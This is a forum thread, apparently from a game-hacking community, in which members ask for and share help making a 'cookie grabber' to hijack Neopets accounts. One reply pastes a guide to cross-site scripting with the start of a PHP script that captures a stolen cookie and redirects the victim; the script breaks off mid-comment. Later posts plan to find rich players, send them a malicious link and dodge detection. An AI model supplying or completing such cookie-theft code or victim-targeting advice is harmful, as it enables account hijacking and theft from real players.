Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: Would possibly pay for a CGer? :o

  1. #1

    Joined
    Dec 2011
    Posts
    635
    Thanks
    300
    Thanked
    184/151
    DL/UL
    28/0
    Mentioned
    171 times
    Time Online
    15d 13h 55m
    Avg. Time Online
    5m

    Would possibly pay for a CGer? :o

    Anyone know how to make one?
    Might be willing to pay ^-^

  2. #2

    Joined
    Jun 2012
    Posts
    1,699
    Thanks
    876
    Thanked
    2,881/1,142
    DL/UL
    44/1
    Mentioned
    562 times
    Time Online
    118d 6h 45m
    Avg. Time Online
    40m
    How much are you willing to pay , it would not come cheap. The risk of them being patched when sold gos up alot and I have no control over what you do with it.

    Here is a guide on how to make them that is public and allowed to be published here (I assume so anyway , I found this on pastebin via google search here (you need an account to see links) , full credits goto @(you need an account to see links).


    First off, thank you to Inq for giving me a couple accounts to cookie grab.

    Secondly, thank you to Kyo for his expertise; most of what I've learned is from him. The rest, I learned along the way. Now, onto the guide.

    Thirdly, yes. You really are looking at a cookie grabbing guide. No, this guide will not kill the market. But maybe this might in Level 3...? Doesn't matter anyway.

    Cross-site scripting (XSS) is possible when a site has insecure coding. When websites allow us to interact with them (e.g. search box, comment boxes, etc) and don't keep it secure, they render themselves vulnerable to code injection.

    Many CGers take advantage of this and employ PHP and Javascript to snag the cookies. XSS itself isn't needed to CG, however but is just a step away from PHP/JS.


    Requirements
    Basic knowledge of HTML
    A website host (nearlyfreespeech, tech.coop, netfirms, etc)


    Writing the script
    People use PHP to retrieve the cookies and record it to a text file. A PHP script begins with <?php and ends with ?>.

    [code]
    <?php
    header("Location: http://www.neopets.com/index.phtml");
    // This is a redirect link takes the user to the specified link
    // after they view the page the cookie-grabbing code is on.


    $cookie = $_GET['cookie'];
    [COLOR=#FF8C00]// This line sends data to the PHP file using the GET command.
    // The data is named
    Last edited by DarkByte; 08-03-2012 at 09:44 AM.

  3. The Following 2 Users Say Thank You to DarkByte For This Useful Post:

    iBeast (08-03-2012),metaldroga (08-03-2012)

  4. #3

    Joined
    Dec 2011
    Posts
    635
    Thanks
    300
    Thanked
    184/151
    DL/UL
    28/0
    Mentioned
    171 times
    Time Online
    15d 13h 55m
    Avg. Time Online
    5m
    Thanks
    The guide helped!

  5. #4

    Joined
    Dec 2011
    Posts
    29
    Thanks
    107
    Thanked
    623/327
    DL/UL
    38/0
    Mentioned
    348 times
    Time Online
    13d 5h 13m
    Avg. Time Online
    4m
    @(you need an account to see links) I'd pay for you to get me one going to where I could post it on neo

  6. #5

    Joined
    Dec 2011
    Posts
    635
    Thanks
    300
    Thanked
    184/151
    DL/UL
    28/0
    Mentioned
    171 times
    Time Online
    15d 13h 55m
    Avg. Time Online
    5m
    I can get the CGer It just won't let me post on my profile D:

  7. #6

    Joined
    Dec 2011
    Posts
    29
    Thanks
    107
    Thanked
    623/327
    DL/UL
    38/0
    Mentioned
    348 times
    Time Online
    13d 5h 13m
    Avg. Time Online
    4m
    Heard something on eno about peopl being cg'd by neomails o.o

  8. #7

    Joined
    Dec 2011
    Posts
    635
    Thanks
    300
    Thanked
    184/151
    DL/UL
    28/0
    Mentioned
    171 times
    Time Online
    15d 13h 55m
    Avg. Time Online
    5m
    Well there is that mass neomail spammer :o

  9. #8

    Joined
    Dec 2011
    Posts
    635
    Thanks
    300
    Thanked
    184/151
    DL/UL
    28/0
    Mentioned
    171 times
    Time Online
    15d 13h 55m
    Avg. Time Online
    5m
    @(you need an account to see links)
    If I find a break-through I will let you know

  10. #9

    Joined
    Jun 2012
    Posts
    1,699
    Thanks
    876
    Thanked
    2,881/1,142
    DL/UL
    44/1
    Mentioned
    562 times
    Time Online
    118d 6h 45m
    Avg. Time Online
    40m
    Such a cookie grabber would be reportable and detectable extremly fast. Anything you put on profiles ect is logged by neopets , they can see the code you use and patch it. The best ones in my opinion are done offsite and target a particular person. Usually they wont even know it happened and by the time they do , you could of already moved your code.

  11. #10

    Joined
    Dec 2011
    Posts
    635
    Thanks
    300
    Thanked
    184/151
    DL/UL
    28/0
    Mentioned
    171 times
    Time Online
    15d 13h 55m
    Avg. Time Online
    5m
    Oh sweet! :o
    Now I need a host for a website.
    Need to find a rich player get there skype or something then link them to something to grab there cookies with there neopets data in it.
    Is this what you are saying @(you need an account to see links)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •